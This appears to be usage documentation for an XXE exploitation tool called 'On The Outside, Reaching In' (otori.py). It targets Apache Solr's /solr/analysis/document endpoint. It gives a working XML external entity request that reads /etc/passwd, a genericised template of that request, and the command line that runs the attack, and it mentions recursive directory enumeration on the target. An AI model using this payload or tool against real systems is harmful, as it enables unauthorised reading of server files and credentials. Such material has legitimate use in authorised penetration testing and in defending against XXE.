The following request is tested using Burp Suite and is found to successfully return the contents of /etc/passwd on the target system:

POST /solr/analysis/document HTTP/1.1
Host: solrtarget.vuln.local:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=qz9ii6ll6djn
Connection: keep-alive
Content-Length: 194

<?xml version="1.0" ?>
<!DOCTYPE add [
	<!ELEMENT field ANY>
	<!ENTITY glyphwhiskey SYSTEM "file:///etc/passwd">
]>
<add>
	<doc>
		<field name="id">&glyphwhiskey;</field>
	</doc>
</add>

That request is converted to Unix-style newline characters, then "genericized" into the format On The Outside, Reaching In expects (see the detailed tutorial for more information):

POST /solr/analysis/document HTTP/1.1
Host: solrtarget.vuln.local:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=qz9ii6ll6djn
Connection: keep-alive
Content-Length: 194

<?xml version="1.0" ?>
%ENTITYDEFINITIONBLOCK%
<add>
	<doc>
		<%ELEMENT% name="id">%DELIMITER%%ENTITYREFERENCEBLOCK%%DELIMITER%</%ELEMENT%>
	</doc>
</add>

This modified version is saved as the file generic_xxe_request-solr-darh-template.txt

This template file is then used with this module using a command similar to:

python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "generic_xxe_request-solr_darh-template.txt" "http://solrtarget.vuln.local:8983/solr/analysis/document" "" "" "field" --outputbase "./output-generic-solr" --overwrite

The example module options are:

1 - The name/path of the template request file (generic_xxe_request-solr_darh-template.txt).
2 - The URL of the vulnerable Solr instance (this is not obtained from the request template in case the Host header is being spoofed).
3 - Whether or not to base64-encode the response - an empty value or "false" is specified here because Solr is based on Java, and only PHP supports base64-encoding XXE data.
4 - The name of the XML DOCTYPE - an empty value is specified here so that the system will default to a randomly-generated value.
5 - The name of the XML tag which contains the XXE reference ("field", in the case of Solr).

Of course, this module can be used with the other operating modes, such as recursive directory enumeration on the target.